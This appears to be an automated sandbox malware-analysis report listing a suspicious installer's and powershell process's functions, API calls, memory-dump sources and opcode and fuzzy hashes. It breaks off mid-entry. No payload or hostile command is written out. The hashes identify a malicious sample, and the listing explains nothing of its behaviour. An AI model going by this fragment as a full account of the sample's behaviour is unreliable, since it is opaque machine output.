                                                                                                        • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                                                        • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                        • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                                                        Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                        • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                        • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                        • String ID:
                                                                                                        • API String ID: 2102729457-0
                                                                                                        • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                        • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                                        • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                        • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                                        Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                          • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                        • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                        • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                                        • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                        • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                                        Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                        • API String ID: 1100898210-2382934351
                                                                                                        • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                        • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                                                        • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                        • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                                                        Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                                                        • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrlen
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 2709904686-3976562730
                                                                                                        • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                        • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                                                        • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                        • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                                        Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                        • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 190613189-0
                                                                                                        • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                        • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                                        • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                        • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                                                        Executed Functions

                                                                                                        Function 02C877F9 Relevance: .1, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b939f1705f33680e32b9b605537488f4e775dc0509774b5269f0085fcf4350d
                                                                                                        • Instruction ID: 340333001a7cae9c30cc01437646bf82cd9ee5593fad7fc737859bc51968a358
                                                                                                        • Opcode Fuzzy Hash: 0b939f1705f33680e32b9b605537488f4e775dc0509774b5269f0085fcf4350d
                                                                                                        • Instruction Fuzzy Hash: CC41B235A002148FDB15DB74C858AEDBBF6EFC9354F188468E406EB7A0DB74AD46CB90
                                                                                                        Function 071A60E0 Relevance: 11.0, Strings: 8, Instructions: 978COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$x.k$-k
                                                                                                        • API String ID: 0-3997674584
                                                                                                        • Opcode ID: 875decb8b8e7a267a2519d9abc7368a0f1d5054b17c38de0c773e5bebf242047
                                                                                                        • Instruction ID: b82a0677f86458eeb040fa53e4274498c5f52b92c84e07f41f1da9d88ede45bc
                                                                                                        • Opcode Fuzzy Hash: 875decb8b8e7a267a2519d9abc7368a0f1d5054b17c38de0c773e5bebf242047
                                                                                                        • Instruction Fuzzy Hash: 8C82CFB4B00215DFDB25CF58C954BAABBB2AF85300F15C0A9D909AF381CB72ED45CB91
                                                                                                        Function 071A7B60 Relevance: 7.9, Strings: 6, Instructions: 373COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3499190445
                                                                                                        • Opcode ID: 9944975cb1d36a79fd49a997261524ba0654fc5da667816421b8fb281e017734
                                                                                                        • Instruction ID: a0c1947657945e063a0f07a77f440865cc9ca404504ed6aff608c7ac87519b18
                                                                                                        • Opcode Fuzzy Hash: 9944975cb1d36a79fd49a997261524ba0654fc5da667816421b8fb281e017734
                                                                                                        • Instruction Fuzzy Hash: 3BE1B1B4B10206DFDB1ADB65C555BAEBBB2AF88304F25C028E9056F3C5CB35ED428B51
                                                                                                        Function 071AB7F8 Relevance: 5.5, Strings: 4, Instructions: 504COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3832083339
                                                                                                        • Opcode ID: 44993ed21bf3da6396e8602f7dd072b3e01c585e2e9f1444bd6b907074241be7
                                                                                                        • Instruction ID: 0c6eb1e4aaec078841fb8186804528c8e6b509e38bfeab62e437c34d2549db84
                                                                                                        • Opcode Fuzzy Hash: 44993ed21bf3da6396e8602f7dd072b3e01c585e2e9f1444bd6b907074241be7
                                                                                                        • Instruction Fuzzy Hash: 0D225FB4B003189FD725DB58C951B9BBBB2AF89304F118198D909AF791CB72ED42CF91
                                                                                                        Function 071A7B44 Relevance: 5.3, Strings: 4, Instructions: 304COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3832083339
                                                                                                        • Opcode ID: 45aec612460f0f12ba7fbf425ec97be4330097b566b29f428dc5d9db69623e60
                                                                                                        • Instruction ID: f4d89ce39e083eaf4827c6d0ef72baf7a1f59af98520ca45eb7e9d7913cc00ba
                                                                                                        • Opcode Fuzzy Hash: 45aec612460f0f12ba7fbf425ec97be4330097b566b29f428dc5d9db69623e60
                                                                                                        • Instruction Fuzzy Hash: F5C1CDB8A10206EFDB1ACB54C540BAEBBB2AF88314F15C059E8057F3D5CB36ED428B51
                                                                                                        Function 071A7B30 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3832083339
                                                                                                        • Opcode ID: 77ea4b8fb4f0541f56ba65986e317644929dbbb5249f064a4c06d11eca137e70
                                                                                                        • Instruction ID: e60b66c8e93404ac4076376fd233c7bb2b2a0a77af7537c513c70ceca3d266ad
                                                                                                        • Opcode Fuzzy Hash: 77ea4b8fb4f0541f56ba65986e317644929dbbb5249f064a4c06d11eca137e70
                                                                                                        • Instruction Fuzzy Hash: BDC1BCB8A10206EFDB1ACB54C540BAEBBB2AF88314F15C059E9057F3D5CB36ED428B51
                                                                                                        Function 071A6F0A Relevance: 4.4, Strings: 3, Instructions: 646COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: 587bef8360a5a45e822b96e2391a4f123a62f812410b0d51b41188234c3ca45f
                                                                                                        • Instruction ID: 45dd66e1924869d2243ab0bfe5c8c16d12db7c67e72de58a7797ef816bc3f556
                                                                                                        • Opcode Fuzzy Hash: 587bef8360a5a45e822b96e2391a4f123a62f812410b0d51b41188234c3ca45f
                                                                                                        • Instruction Fuzzy Hash: A4526CB4B10215DFD725DF18C951B6ABBB2BB88304F15C099D909AF391CB72ED82CB91
                                                                                                        Function 071A6478 Relevance: 4.4, Strings: 3, Instructions: 629COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: db6ec3bfe0d6309f7e042faf2681438cda0b69e0ad62775761f1e38855947780
                                                                                                        • Instruction ID: 6056599ccd2e2237d5e72db0583e5ca97b8ff3a7815a06c0edccc257722e3e9e
                                                                                                        • Opcode Fuzzy Hash: db6ec3bfe0d6309f7e042faf2681438cda0b69e0ad62775761f1e38855947780
                                                                                                        • Instruction Fuzzy Hash: CB425AB4A10215DFDB25CF58C954B6ABBB2BB84304F15C099D909AF391CB72ED81CF91
                                                                                                        Function 071ABFEB Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: 14d0324526eb07ce089e9427bbce07d59336219fbd30ad4fc63fb0522151c06f
                                                                                                        • Instruction ID: 5b40d003bddf8a2f6b7b28b87e8fa02268141f21882291097b2812419d306bfd
                                                                                                        • Opcode Fuzzy Hash: 14d0324526eb07ce089e9427bbce07d59336219fbd30ad4fc63fb0522151c06f
                                                                                                        • Instruction Fuzzy Hash: 4B4260B4B003189FD725DB58C951BAABBB2AB89304F11C199D9099F391CB72ED42CF91
                                                                                                        Function 071A701C Relevance: 4.2, Strings: 3, Instructions: 489COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: c17fcfb79b0ec293a72324b88f5bc9df193b0a2754e20cf7a798b3df0c3e7cc2
                                                                                                        • Instruction ID: 31e83b5e207caa67df96acb0dd42cc51b2ef2275bb5c1748e704a797b9e368e2
                                                                                                        • Opcode Fuzzy Hash: c17fcfb79b0ec293a72324b88f5bc9df193b0a2754e20cf7a798b3df0c3e7cc2
                                                                                                        • Instruction Fuzzy Hash: 12226CB4B102149FD725DF14C955B6ABBB2BB88304F15C098DA09AF391CB72ED85CF91
                                                                                                        Function 071AC0D1 Relevance: 4.2, Strings: 3, Instructions: 469COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$x.k$-k
                                                                                                        • API String ID: 0-196464176
                                                                                                        • Opcode ID: 08cf9cc1d1f7a1242177aabd9f439b681e2830634f3d866d07c6594f647e7592
                                                                                                        • Instruction ID: 43dc31692d93e769a178b90e8e8b07992c646f994b7c6f73a354ad90cf02c3d4
                                                                                                        • Opcode Fuzzy Hash: 08cf9cc1d1f7a1242177aabd9f439b681e2830634f3d866d07c6594f647e7592
                                                                                                        • Instruction Fuzzy Hash: BA1250B4B003189FD725DB58C951B9BBBB2AB89304F11C198D909AF791CB72ED42CF91
                                                                                                        Function 071A3E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $q$$q$$q
                                                                                                        • API String ID: 0-3067366958
                                                                                                        • Opcode ID: f243c1b6203e266adde80ee4754cf858e24d44cfd5da7fc9e708708fb7422b02
                                                                                                        • Instruction ID: 6163071e20cff22b900b176739d415c553b5faf273c88cfed54c1e4ec1634f3f
                                                                                                        • Opcode Fuzzy Hash: f243c1b6203e266adde80ee4754cf858e24d44cfd5da7fc9e708708fb7422b02
                                                                                                        • Instruction Fuzzy Hash: 03415AB9B00216ABCB255B69D80136BF7F5EF84210B14852ADC25FB381DB32DD01C7E1
                                                                                                        Function 071AF9AD Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q
                                                                                                        • API String ID: 0-1467158625
                                                                                                        • Opcode ID: 2923ce9013afcf31ae521ea49352379c78cd95a403bb381f2f67463023e80b4c
                                                                                                        • Instruction ID: 1daa96f9b5d83ccf03d2a0ebad498f8057ef586011628fa346d4e99299403fd3
                                                                                                        • Opcode Fuzzy Hash: 2923ce9013afcf31ae521ea49352379c78cd95a403bb381f2f67463023e80b4c
                                                                                                        • Instruction Fuzzy Hash: 9D3159FA700317ABDB2A567458207BABB9A9B85610F24847AD902DF2C1DF76CD43C361
                                                                                                        Function 071A3DEB Relevance: 2.6, Strings: 2, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $q$$q
                                                                                                        • API String ID: 0-3126353813
                                                                                                        • Opcode ID: 2ba676621425958cdb501edcfca68002ea5e7db0872efeb105d56f4b94691001
                                                                                                        • Instruction ID: c01af80a09c2a44a0386ce0c70bb5ab830cea35851f927e78990c3ae92bb221c
                                                                                                        • Opcode Fuzzy Hash: 2ba676621425958cdb501edcfca68002ea5e7db0872efeb105d56f4b94691001
                                                                                                        • Instruction Fuzzy Hash: BC21F3FAE00216BFCF258E29D5803A9B7F4FF58210B2A4166EC29F7280E3309941C795
                                                                                                        Function 071AC4FF Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3814145804
                                                                                                        • Opcode ID: 58422577e9b42e5b47a45ac2c17f6d829ad4279bee47688d87d7ead16dd6d8aa
                                                                                                        • Instruction ID: f25d3198ba9a3ae0e499fba849012312b42f8ff1bf7decbaee617d85b98a6238
